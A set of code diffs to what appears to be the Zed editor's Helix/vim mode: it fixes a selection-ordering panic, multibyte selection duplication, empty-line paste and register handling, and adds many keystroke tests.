@@ -845,11 +950,22 @@ impl Vim {
self.update_editor(cx, |_vim, editor, cx| {
let snapshot = editor.snapshot(window, cx);
editor.change_selections(SelectionEffects::default(), window, cx, |s| {
+ let buffer = snapshot.buffer_snapshot();
+
s.select_anchor_ranges(
prior_selections
.iter()
.cloned()
- .chain(s.all_anchors(&snapshot).iter().map(|s| s.range())),
+ .chain(s.all_anchors(&snapshot).iter().map(|s| s.range()))
+ .sorted_by(|a, b| {
+ a.start
+ .cmp(&b.start, buffer)
+ .then_with(|| a.end.cmp(&b.end, buffer))
+ })
+ .dedup_by(|a, b| {
+ a.start.cmp(&b.start, buffer).is_eq()
+ && a.end.cmp(&b.end, buffer).is_eq()
+ }),
);
})
});
@@ -859,7 +975,7 @@ impl Vim {
#[cfg(test)]
mod test {
- use gpui::{UpdateGlobal, VisualTestContext};
+ use gpui::{KeyBinding, UpdateGlobal, VisualTestContext};
use indoc::indoc;
use project::FakeFs;
use search::{ProjectSearchView, project_search};
@@ -932,6 +1048,310 @@ mod test {
cx.assert_state("aa\n«ˇ »bb", Mode::HelixNormal);
}
+ #[gpui::test]
+ async fn test_next_subword_start(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystroke`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "w",
+ crate::motion::NextSubwordStart {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("ˇfoo.bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ».bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«.ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo.«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ»(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«(ˇ»bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo(«barˇ»)", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo_bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«foo_ˇ»bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo_«bar_ˇ»baz", Mode::HelixNormal);
+
+ cx.set_state("ˇfooBarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ»BarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«Barˇ»Baz", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«fooˇ»;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo«;ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("foo;«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇ<?php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("«<?ˇ»php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?«phpˇ»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n«$ˇ»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$«someˇ»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$some«Variable ˇ»= 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$someVariable «= ˇ»2;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$someVariable = «2ˇ»;", Mode::HelixNormal);
+ cx.simulate_keystroke("w");
+ cx.assert_state("<?php\n\n$someVariable = 2«;ˇ»", Mode::HelixNormal);
+ }
+
+ #[gpui::test]
+ async fn test_next_subword_end(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystroke`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "e",
+ crate::motion::NextSubwordEnd {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("ˇfoo.bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ».bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«.ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo.«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»(bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«(ˇ»bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo(«barˇ»)", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo_bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»_bar_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«_barˇ»_baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo_bar«_bazˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfooBarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»BarBaz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«Barˇ»Baz", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("fooBar«Bazˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇfoo;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«fooˇ»;bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo«;ˇ»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("foo;«barˇ»", Mode::HelixNormal);
+
+ cx.set_state("ˇ<?php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("«<?ˇ»php\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?«phpˇ»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n«$ˇ»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$«someˇ»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$some«Variableˇ» = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$someVariable« =ˇ» 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$someVariable =« 2ˇ»;", Mode::HelixNormal);
+ cx.simulate_keystroke("e");
+ cx.assert_state("<?php\n\n$someVariable = 2«;ˇ»", Mode::HelixNormal);
+ }
+
+ #[gpui::test]
+ async fn test_previous_subword_start(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystroke`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "b",
+ crate::motion::PreviousSubwordStart {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("foo.barˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo.«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇ.»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo».bar", Mode::HelixNormal);
+
+ cx.set_state("foo(bar)ˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo(bar«ˇ)»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo(«ˇbar»)", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇ(»bar)", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo»(bar)", Mode::HelixNormal);
+
+ cx.set_state("foo_bar_bazˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo_bar_«ˇbaz»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo_«ˇbar_»baz", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo_»bar_baz", Mode::HelixNormal);
+
+ cx.set_state("foo;barˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo;«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇ;»bar", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo»;bar", Mode::HelixNormal);
+
+ cx.set_state("<?php\n\n$someVariable = 2;ˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$someVariable = 2«ˇ;»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$someVariable = «ˇ2»;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$someVariable «ˇ= »2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$some«ˇVariable »= 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n$«ˇsome»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?php\n\n«ˇ$»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("<?«ˇphp»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇ<?»php\n\n$someVariable = 2;", Mode::HelixNormal);
+
+ cx.set_state("fooBarBazˇ", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("fooBar«ˇBaz»", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("foo«ˇBar»Baz", Mode::HelixNormal);
+ cx.simulate_keystroke("b");
+ cx.assert_state("«ˇfoo»BarBaz", Mode::HelixNormal);
+ }
+
+ #[gpui::test]
+ async fn test_previous_subword_end(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Setup custom keybindings for subword motions so we can use the bindings
+ // in `simulate_keystrokes`.
+ cx.update(|_window, cx| {
+ cx.bind_keys([KeyBinding::new(
+ "g e",
+ crate::motion::PreviousSubwordEnd {
+ ignore_punctuation: false,
+ },
+ None,
+ )]);
+ });
+
+ cx.set_state("foo.barˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo.«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ.»bar", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo».bar", Mode::HelixNormal);
+
+ cx.set_state("foo(bar)ˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo(bar«ˇ)»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo(«ˇbar»)", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ(»bar)", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»(bar)", Mode::HelixNormal);
+
+ cx.set_state("foo_bar_bazˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo_bar«ˇ_baz»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ_bar»_baz", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»_bar_baz", Mode::HelixNormal);
+
+ cx.set_state("foo;barˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo;«ˇbar»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇ;»bar", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»;bar", Mode::HelixNormal);
+
+ cx.set_state("<?php\n\n$someVariable = 2;ˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$someVariable = 2«ˇ;»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$someVariable =«ˇ 2»;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$someVariable«ˇ =» 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$some«ˇVariable» = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n$«ˇsome»Variable = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?php\n\n«ˇ$»someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("<?«ˇphp»\n\n$someVariable = 2;", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇ<?»php\n\n$someVariable = 2;", Mode::HelixNormal);
+
+ cx.set_state("fooBarBazˇ", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("fooBar«ˇBaz»", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("foo«ˇBar»Baz", Mode::HelixNormal);
+ cx.simulate_keystrokes("g e");
+ cx.assert_state("«ˇfoo»BarBaz", Mode::HelixNormal);
+ }
+
#[gpui::test]
async fn test_delete(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -1447,6 +1867,47 @@ mod test {
ˇ»line five"},
Mode::HelixNormal,
);
+
+ // Test selecting with an empty line below the current line
+ cx.set_state(
+ indoc! {"
+ line one
+ line twoˇ
+
+ line four
+ line five"},
+ Mode::HelixNormal,
+ );
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ line one
+ «line two
+ ˇ»
+ line four
+ line five"},
+ Mode::HelixNormal,
+ );
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ line one
+ «line two
+
+ ˇ»line four
+ line five"},
+ Mode::HelixNormal,
+ );
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ line one
+ «line two
+
+ line four
+ ˇ»line five"},
+ Mode::HelixNormal,
+ );
}
#[gpui::test]
@@ -1598,6 +2059,25 @@ mod test {
cx.assert_state("hello two «oneˇ» two «oneˇ» two «oneˇ»", Mode::HelixSelect);
}
+ #[gpui::test]
+ async fn test_helix_select_next_match_wrapping(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Three occurrences of "one". After selecting all three with `n n`,
+ // pressing `n` again wraps the search to the first occurrence.
+ // The prior selections (at higher offsets) are chained before the
+ // wrapped selection (at a lower offset), producing unsorted anchors
+ // that cause `rope::Cursor::summary` to panic with
+ // "cannot summarize backward".
+ cx.set_state("ˇhello two one two one two one", Mode::HelixSelect);
+ cx.simulate_keystrokes("/ o n e");
+ cx.simulate_keystrokes("enter");
+ cx.simulate_keystrokes("n n n");
+ // Should not panic; all three occurrences should remain selected.
+ cx.assert_state("hello two «oneˇ» two «oneˇ» two «oneˇ»", Mode::HelixSelect);
+ }
+
#[gpui::test]
async fn test_helix_substitute(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -1848,4 +2328,51 @@ mod test {
Mode::HelixSelect,
);
}
+
+ #[gpui::test]
+ async fn test_helix_insert_end_of_line(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Ensure that, when lines are selected using `x`, pressing `shift-a`
+ // actually puts the cursor at the end of the selected lines and not at
+ // the end of the line below.
+ cx.set_state(
+ indoc! {"
+ line oˇne
+ line two"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("x");
+ cx.assert_state(
+ indoc! {"
+ «line one
+ ˇ»line two"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("shift-a");
+ cx.assert_state(
+ indoc! {"
+ line oneˇ
+ line two"},
+ Mode::Insert,
+ );
+
+ cx.set_state(
+ indoc! {"
+ line «one
+ lineˇ» two"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("shift-a");
+ cx.assert_state(
+ indoc! {"
+ line one
+ line twoˇ"},
+ Mode::Insert,
+ );
+ }
}
@@ -2,11 +2,19 @@ use std::ops::Range;
use editor::{DisplayPoint, MultiBufferOffset, display_map::DisplaySnapshot};
use gpui::Context;
+use language::PointUtf16;
+use multi_buffer::MultiBufferRow;
use text::Bias;
use ui::Window;
use crate::Vim;
+#[derive(Copy, Clone)]
+enum Direction {
+ Above,
+ Below,
+}
+
impl Vim {
/// Creates a duplicate of every selection below it in the first place that has both its start
/// and end
@@ -16,14 +24,7 @@ impl Vim {
window: &mut Window,
cx: &mut Context<Self>,
) {
- self.duplicate_selections(
- times,
- window,
- cx,
- &|prev_point| *prev_point.row_mut() += 1,
- &|prev_range, map| prev_range.end.row() >= map.max_point().row(),
- false,
- );
+ self.duplicate_selections(times, window, cx, Direction::Below);
}
/// Creates a duplicate of every selection above it in the first place that has both its start
@@ -34,14 +35,7 @@ impl Vim {
window: &mut Window,
cx: &mut Context<Self>,
) {
- self.duplicate_selections(
- times,
- window,
- cx,
- &|prev_point| *prev_point.row_mut() = prev_point.row().0.saturating_sub(1),
- &|prev_range, _| prev_range.start.row() == DisplayPoint::zero().row(),
- true,
- );
+ self.duplicate_selections(times, window, cx, Direction::Above);
}
fn duplicate_selections(
@@ -49,9 +43,7 @@ impl Vim {
times: Option<usize>,
window: &mut Window,
cx: &mut Context<Self>,
- advance_search: &dyn Fn(&mut DisplayPoint),
- end_search: &dyn Fn(&Range<DisplayPoint>, &DisplaySnapshot) -> bool,
- above: bool,
+ direction: Direction,
) {
let times = times.unwrap_or(1);
self.update_editor(cx, |_, editor, cx| {
@@ -59,7 +51,7 @@ impl Vim {
let map = editor.display_snapshot(cx);
let mut original_selections = editor.selections.all_display(&map);
// The order matters, because it is recorded when the selections are added.
- if above {
+ if matches!(direction, Direction::Above) {
original_selections.reverse();
}
@@ -68,12 +60,9 @@ impl Vim {
selections.push(display_point_range_to_offset_range(&origin, &map));
let mut last_origin = origin;
for _ in 1..=times {
- if let Some(duplicate) = find_next_valid_duplicate_space(
- last_origin.clone(),
- &map,
- &advance_search,
- &end_search,
- ) {
+ if let Some(duplicate) =
+ find_next_valid_duplicate_space(last_origin.clone(), &map, direction)
+ {
selections.push(display_point_range_to_offset_range(&duplicate, &map));
last_origin = duplicate;
} else {
@@ -90,22 +79,62 @@ impl Vim {
}
fn find_next_valid_duplicate_space(
- mut origin: Range<DisplayPoint>,
+ origin: Range<DisplayPoint>,
map: &DisplaySnapshot,
- advance_search: &impl Fn(&mut DisplayPoint),
- end_search: &impl Fn(&Range<DisplayPoint>, &DisplaySnapshot) -> bool,
+ direction: Direction,
) -> Option<Range<DisplayPoint>> {
- while !end_search(&origin, map) {
- advance_search(&mut origin.start);
- advance_search(&mut origin.end);
+ let buffer = map.buffer_snapshot();
+ let start_col_utf16 = buffer
+ .point_to_point_utf16(origin.start.to_point(map))
+ .column;
+ let end_col_utf16 = buffer.point_to_point_utf16(origin.end.to_point(map)).column;
- if map.clip_point(origin.start, Bias::Left) == origin.start
- && map.clip_point(origin.end, Bias::Right) == origin.end
+ let mut candidate = origin;
+ loop {
+ match direction {
+ Direction::Below => {
+ if candidate.end.row() >= map.max_point().row() {
+ return None;
+ }
+ *candidate.start.row_mut() += 1;
+ *candidate.end.row_mut() += 1;
+ }
+ Direction::Above => {
+ if candidate.start.row() == DisplayPoint::zero().row() {
+ return None;
+ }
+ *candidate.start.row_mut() = candidate.start.row().0.saturating_sub(1);
+ *candidate.end.row_mut() = candidate.end.row().0.saturating_sub(1);
+ }
+ }
+
+ let start_row = DisplayPoint::new(candidate.start.row(), 0)
+ .to_point(map)
+ .row;
+ let end_row = DisplayPoint::new(candidate.end.row(), 0).to_point(map).row;
+
+ if start_col_utf16 > buffer.line_len_utf16(MultiBufferRow(start_row))
+ || end_col_utf16 > buffer.line_len_utf16(MultiBufferRow(end_row))
{
- return Some(origin);
+ continue;
+ }
+
+ let start_col = buffer
+ .point_utf16_to_point(PointUtf16::new(start_row, start_col_utf16))
+ .column;
+ let end_col = buffer
+ .point_utf16_to_point(PointUtf16::new(end_row, end_col_utf16))
+ .column;
+
+ let candidate_start = DisplayPoint::new(candidate.start.row(), start_col);
+ let candidate_end = DisplayPoint::new(candidate.end.row(), end_col);
+
+ if map.clip_point(candidate_start, Bias::Left) == candidate_start
+ && map.clip_point(candidate_end, Bias::Right) == candidate_end
+ {
+ return Some(candidate_start..candidate_end);
}
}
- None
}
fn display_point_range_to_offset_range(
@@ -231,4 +260,54 @@ mod tests {
Mode::HelixNormal,
);
}
+
+ #[gpui::test]
+ async fn test_selection_duplication_multiline_multibyte(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Multiline selection on rows with multibyte chars should preserve
+ // the visual column on both start and end rows.
+ cx.set_state(
+ indoc! {"
+ «H䡻llo
+ Hëllo
+ Hallo"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("C");
+
+ cx.assert_state(
+ indoc! {"
+ «H䡻llo
+ «H롻llo
+ Hallo"},
+ Mode::HelixNormal,
+ );
+ }
+
+ #[gpui::test]
+ async fn test_selection_duplication_multibyte(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+
+ // Selection on a line with multibyte chars should duplicate to the
+ // same character column on the next line, not skip it.
+ cx.set_state(
+ indoc! {"
+ H«äˇ»llo
+ Hallo"},
+ Mode::HelixNormal,
+ );
+
+ cx.simulate_keystrokes("C");
+
+ cx.assert_state(
+ indoc! {"
+ H«äˇ»llo
+ H«aˇ»llo"},
+ Mode::HelixNormal,
+ );
+ }
}
@@ -33,16 +33,14 @@ impl Vim {
let selected_register = vim.selected_register.take();
- let Some((text, clipboard_selections)) = Vim::update_globals(cx, |globals, cx| {
+ let Some(register) = Vim::update_globals(cx, |globals, cx| {
globals.read_register(selected_register, Some(editor), cx)
})
- .and_then(|reg| {
- (!reg.text.is_empty())
- .then_some(reg.text)
- .zip(reg.clipboard_selections)
- }) else {
+ .filter(|reg| !reg.text.is_empty()) else {
return;
};
+ let text = register.text;
+ let clipboard_selections = register.clipboard_selections;
let display_map = editor.display_snapshot(cx);
let current_selections = editor.selections.all_adjusted_display(&display_map);
@@ -63,7 +61,9 @@ impl Vim {
let mut replacement_texts: Vec<String> = Vec::new();
for ix in 0..current_selections.len() {
- let to_insert = if let Some(clip_sel) = clipboard_selections.get(ix) {
+ let to_insert = if let Some(clip_sel) =
+ clipboard_selections.as_ref().and_then(|s| s.get(ix))
+ {
let end_offset = start_offset + clip_sel.len;
let text = text[start_offset..end_offset].to_string();
start_offset = if clip_sel.is_entire_line {
@@ -102,13 +102,16 @@ impl Vim {
} else if action.before {
sel.start
} else if sel.start == sel.end {
- // Helix and Zed differ in how they understand
- // single-point cursors. In Helix, a single-point cursor
- // is "on top" of some character, and pasting after that
- // cursor means that the pasted content should go after
- // that character. (If the cursor is at the end of a
- // line, the pasted content goes on the next line.)
- movement::right(&display_map, sel.end)
+ // In Helix, a single-point cursor is "on top" of a
+ // character, and pasting after means after that character.
+ // At line end this means the next line. But on an empty
+ // line there is no character, so paste at the cursor.
+ let right = movement::right(&display_map, sel.end);
+ if right.row() != sel.end.row() && sel.end.column() == 0 {
+ sel.end
+ } else {
+ right
+ }
} else {
sel.end
};
@@ -146,8 +149,58 @@ impl Vim {
mod test {
use indoc::indoc;
+ use gpui::ClipboardItem;
+
use crate::{state::Mode, test::VimTestContext};
+ #[gpui::test]
+ async fn test_system_clipboard_paste(cx: &mut gpui::TestAppContext) {
+ let mut cx = VimTestContext::new(cx, true).await;
+ cx.enable_helix();
+ cx.set_state(
+ indoc! {"
+ The quiˇck brown
+ fox jumps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+
+ cx.write_to_clipboard(ClipboardItem::new_string("clipboard".to_string()));
+ cx.simulate_keystrokes("p");
+ cx.assert_state(
+ indoc! {"
+ The quic«clipboardˇ»k brown
+ fox jumps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+
+        // Multiple cursors with system clipboard (no metadata) paste
+ // the same text at each cursor.
+ cx.set_state(
+ indoc! {"
+ ˇThe quick brown
+ fox ˇjumps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+ cx.write_to_clipboard(ClipboardItem::new_string("hi".to_string()));
+ cx.simulate_keystrokes("p");
+ cx.assert_state(
+ indoc! {"
+ T«hiˇ»he quick brown
+ fox j«hiˇ»umps over
+ the lazy dog."},
+ Mode::HelixNormal,
+ );
+
+ // Multiple cursors on empty lines should paste on those same lines.
+ cx.set_state("ˇ\nˇ\nˇ\nend", Mode::HelixNormal);
+ cx.write_to_clipboard(ClipboardItem::new_string("X".to_string()));
+ cx.simulate_keystrokes("p");
+ cx.assert_state("«Xˇ»\n«Xˇ»\n«Xˇ»\nend", Mode::HelixNormal);
+ }
+
#[gpui::test]
async fn test_paste(cx: &mut gpui::TestAppContext) {
let mut cx = VimTestContext::new(cx, true).await;
@@ -1924,9 +1924,10 @@ fn next_subword_start(
let found_subword_start = is_subword_start(left, right, ".$_-");
let is_word_start = (left_kind != right_kind)
&& (!right.is_ascii_punctuation() || is_stopping_punct(right));
+
let found = (!right.is_whitespace() && (is_word_start || found_subword_start))
|| at_newline && crossed_newline
- || at_newline && left == '\n'; // Prevents skipping repeated empty lines
+ || right == '\n' && left == '\n'; // Prevents skipping repeated empty lines
crossed_newline |= at_newline;
found
@@ -949,17 +949,16 @@ impl Vim {
let current_line = point.row;
let percentage = current_line as f32 / lines as f32;
let modified = if buffer.is_dirty() { " [modified]" } else { "" };
- vim.status_label = Some(
+ vim.set_status_label(
format!(
"{}{} {} lines --{:.0}%--",
filename,
modified,
lines,
percentage * 100.0,
- )
- .into(),
+ ),
+ cx,
);
- cx.notify();
});
}
@@ -50,6 +50,10 @@ impl Vim {
})
.filter(|reg| !reg.text.is_empty())
else {
+ vim.set_status_label(
+ format!("Nothing in register {}", selected_register.unwrap_or('"')),
+ cx,
+ );
return;
};
let clipboard_selections = clipboard_selections
@@ -249,7 +253,7 @@ impl Vim {
) {
self.stop_recording(cx);
let selected_register = self.selected_register.take();
- self.update_editor(cx, |_, editor, cx| {
+ self.update_editor(cx, |vim, editor, cx| {
editor.transact(window, cx, |editor, window, cx| {
editor.set_clip_at_line_ends(false, cx);
editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| {
@@ -262,6 +266,10 @@ impl Vim {
globals.read_register(selected_register, Some(editor), cx)
})
.filter(|reg| !reg.text.is_empty()) else {
+ vim.set_status_label(
+ format!("Nothing in register {}", selected_register.unwrap_or('"')),
+ cx,
+ );
return;
};
editor.insert(&text, window, cx);
@@ -286,7 +294,7 @@ impl Vim {
) {
self.stop_recording(cx);
let selected_register = self.selected_register.take();
- self.update_editor(cx, |_, editor, cx| {
+ self.update_editor(cx, |vim, editor, cx| {
let text_layout_details = editor.text_layout_details(window, cx);
editor.transact(window, cx, |editor, window, cx| {
editor.set_clip_at_line_ends(false, cx);
@@ -306,6 +314,10 @@ impl Vim {
globals.read_register(selected_register, Some(editor), cx)
})
.filter(|reg| !reg.text.is_empty()) else {
+ vim.set_status_label(
+ format!("Nothing in register {}", selected_register.unwrap_or('"')),
+ cx,
+ );
return;
};
editor.insert(&text, window, cx);
@@ -291,6 +291,24 @@ impl Vim {
}) else {
return;
};
+
+ // Dot repeat always uses the recorded register, ignoring any "X
+ // override, as the register is an inherent part of the recorded action.
+ // For numbered registers, Neovim increments on each dot repeat so after
+        // using `"1p`, using `.` will equate to `"2p`, the next `.` to `"3p`,
+        // etc.
+ let recorded_register = cx.global::<VimGlobals>().recorded_register_for_dot;
+ let next_register = recorded_register
+ .filter(|c| matches!(c, '1'..='9'))
+ .map(|c| ((c as u8 + 1).min(b'9')) as char);
+
+ self.selected_register = next_register.or(recorded_register);
+ if let Some(next_register) = next_register {
+ Vim::update_globals(cx, |globals, _| {
+ globals.recorded_register_for_dot = Some(next_register)
+ })
+ };
+
if mode != Some(self.mode) {
